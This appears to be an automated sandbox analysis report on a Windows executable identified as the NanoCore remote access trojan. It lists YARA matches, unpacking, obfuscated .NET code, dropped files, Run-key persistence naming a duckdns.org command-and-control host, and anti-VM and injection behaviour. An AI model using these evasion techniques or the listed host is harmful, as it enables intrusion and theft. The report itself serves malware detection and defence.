      Source: 2.2.SviRsoKz6E.exe.56b0000.11.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0.2.SviRsoKz6E.exe.33a0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0.2.SviRsoKz6E.exe.33a0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0.2.SviRsoKz6E.exe.33a0000.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.2.SviRsoKz6E.exe.56b0000.11.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 2.2.SviRsoKz6E.exe.56b0000.11.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 2.2.SviRsoKz6E.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 2.2.SviRsoKz6E.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 2.2.SviRsoKz6E.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0.2.SviRsoKz6E.exe.33b1458.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0.2.SviRsoKz6E.exe.33b1458.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0.2.SviRsoKz6E.exe.33b1458.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.2.SviRsoKz6E.exe.4940000.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 2.2.SviRsoKz6E.exe.4940000.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 2.2.SviRsoKz6E.exe.4940000.6.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.2.SviRsoKz6E.exe.415058.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 2.2.SviRsoKz6E.exe.415058.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 2.2.SviRsoKz6E.exe.415058.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.2.SviRsoKz6E.exe.56b4629.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 2.2.SviRsoKz6E.exe.56b4629.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 2.2.SviRsoKz6E.exe.664350.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 2.2.SviRsoKz6E.exe.664350.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 2.2.SviRsoKz6E.exe.664350.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.2.SviRsoKz6E.exe.4f70000.7.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
      Source: 2.2.SviRsoKz6E.exe.4f70000.7.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
      Source: 2.2.SviRsoKz6E.exe.4f70000.7.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
      Source: classification engineClassification label: mal100.troj.evad.winEXE@3/6@18/1
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeCode function: 0_2_00403312 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403312
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeCode function: 0_2_004045D7 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_004045D7
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeCode function: 0_2_0040216B CoCreateInstance,MultiByteToWideChar,0_2_0040216B
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeCode function: 2_2_00401489 GetModuleHandleW,GetModuleHandleW,FindResourceW,GetModuleHandleW,LoadResource,LockResource,GetModuleHandleW,SizeofResource,FreeResource,ExitProcess,2_2_00401489
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeFile created: C:\Users\user\AppData\Roaming\abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyzJump to behavior
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{6a8cfd5d-4b59-4ef3-89b5-b939bcb234ae}
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeFile created: C:\Users\user\AppData\Local\Temp\nsy2F52.tmpJump to behavior
      Source: SviRsoKz6E.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: SviRsoKz6E.exeVirustotal: Detection: 39%
      Source: SviRsoKz6E.exeReversingLabs: Detection: 72%
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeFile read: C:\Users\user\Desktop\SviRsoKz6E.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\SviRsoKz6E.exe 'C:\Users\user\Desktop\SviRsoKz6E.exe'
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeProcess created: C:\Users\user\Desktop\SviRsoKz6E.exe 'C:\Users\user\Desktop\SviRsoKz6E.exe'
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeProcess created: C:\Users\user\Desktop\SviRsoKz6E.exe 'C:\Users\user\Desktop\SviRsoKz6E.exe' Jump to behavior
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
      Source: SviRsoKz6E.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
      Source: Binary string: C:\Windows\System.pdbpdbtem.pdb source: SviRsoKz6E.exe, 00000002.00000002.460484829.00000000006B5000.00000004.00000020.sdmp
      Source: Binary string: wntdll.pdbUGP source: SviRsoKz6E.exe, 00000000.00000003.197706489.00000000035D0000.00000004.00000001.sdmp
      Source: Binary string: wntdll.pdb source: SviRsoKz6E.exe, 00000000.00000003.197706489.00000000035D0000.00000004.00000001.sdmp
      Source: Binary string: ll\System.pdb source: SviRsoKz6E.exe, 00000002.00000003.288689683.0000000005B4B000.00000004.00000001.sdmp
      Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: SviRsoKz6E.exe, 00000002.00000002.460275613.000000000064A000.00000004.00000020.sdmp

      Data Obfuscation:

      barindex
      Detected unpacking (changes PE section rights)Show sources
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeUnpacked PE file: 2.2.SviRsoKz6E.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.gfids:R;.rsrc:R;.reloc:R;
      Detected unpacking (overwrites its own PE header)Show sources
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeUnpacked PE file: 2.2.SviRsoKz6E.exe.400000.1.unpack
      .NET source code contains potential unpackerShow sources
      Source: 2.2.SviRsoKz6E.exe.4f70000.7.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 2.2.SviRsoKz6E.exe.4f70000.7.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeCode function: 2_2_00401F16 push ecx; ret 2_2_00401F29
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeCode function: 2_2_051D7648 push eax; iretd 2_2_051D7649
      Source: 2.2.SviRsoKz6E.exe.4f70000.7.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
      Source: 2.2.SviRsoKz6E.exe.4f70000.7.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeFile created: C:\Users\user\AppData\Local\Temp\nst2F82.tmp\tkmg9lz0c84fk1.dllJump to dropped file
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeFile created: C:\Users\user\AppData\Roaming\abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyz\Adobe.exeJump to dropped file
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run justinalwhitedd554.duckdns.org.exeJump to behavior
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run justinalwhitedd554.duckdns.org.exeJump to behavior

      Hooking and other Techniques for Hiding and Protection:

      barindex
      Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeFile opened: C:\Users\user\Desktop\SviRsoKz6E.exe:Zone.Identifier read attributes | deleteJump to behavior
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeWindow / User API: threadDelayed 962Jump to behavior
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeWindow / User API: threadDelayed 8535Jump to behavior
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeWindow / User API: foregroundWindowGot 836Jump to behavior
      Source: C:\Users\user\Desktop\SviRsoKz6E.exe TID: 4316Thread sleep time: -35000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\SviRsoKz6E.exe TID: 4952Thread sleep time: -11068046444225724s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeCode function: 0_2_00406435 FindFirstFileA,FindClose,0_2_00406435
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeCode function: 0_2_00405889 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405889
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeCode function: 0_2_004027A1 FindFirstFileA,0_2_004027A1
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeCode function: 2_2_00404A29 FindFirstFileExW,2_2_00404A29
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeThread delayed: delay time: 35000Jump to behavior
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: SviRsoKz6E.exe, 00000002.00000002.467548471.0000000006510000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
      Source: SviRsoKz6E.exe, 00000002.00000003.214806356.0000000005B50000.00000004.00000001.sdmpBinary or memory string: QEMu}
      Source: SviRsoKz6E.exe, 00000002.00000002.467548471.0000000006510000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
      Source: SviRsoKz6E.exe, 00000002.00000002.467548471.0000000006510000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
      Source: SviRsoKz6E.exe, 00000002.00000002.467230032.0000000005B30000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: SviRsoKz6E.exe, 00000002.00000002.467548471.0000000006510000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeCode function: 2_2_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_0040446F
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeCode function: 0_2_00A82394 mov eax, dword ptr fs:[00000030h]0_2_00A82394
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeCode function: 0_2_00A82644 mov eax, dword ptr fs:[00000030h]0_2_00A82644
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeCode function: 2_2_004035F1 mov eax, dword ptr fs:[00000030h]2_2_004035F1
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeCode function: 2_2_004067FE GetProcessHeap,2_2_004067FE
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeCode function: 2_2_00401E1D SetUnhandledExceptionFilter,2_2_00401E1D
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeCode function: 2_2_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_0040446F
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeCode function: 2_2_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00401C88
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeCode function: 2_2_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00401F30
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeMemory allocated: page read and write | page guardJump to behavior

      HIPS / PFW / Operating System Protection Evasion:

      barindex
      Maps a DLL or memory area into another processShow sources
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeSection loaded: unknown target: C:\Users\user\Desktop\SviRsoKz6E.exe protection: execute and read and writeJump to behavior
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeProcess created: C:\Users\user\Desktop\SviRsoKz6E.exe 'C:\Users\user\Desktop\SviRsoKz6E.exe' Jump to behavior
      Source: SviRsoKz6E.exe, 00000002.00000002.463739605.0000000002863000.00000004.00000001.sdmpBinary or memory string: Program Manager
      Source: SviRsoKz6E.exe, 00000002.00000002.460934537.0000000000DD0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
      Source: SviRsoKz6E.exe, 00000002.00000002.460934537.0000000000DD0000.00000002.00000001.sdmpBinary or memory string: Progman
      Source: SviRsoKz6E.exe, 00000002.00000002.467518966.00000000063CD000.00000004.00000010.sdmpBinary or memory string: Program Managerv
      Source: SviRsoKz6E.exe, 00000002.00000002.460934537.0000000000DD0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeCode function: 2_2_0040208D cpuid 2_2_0040208D
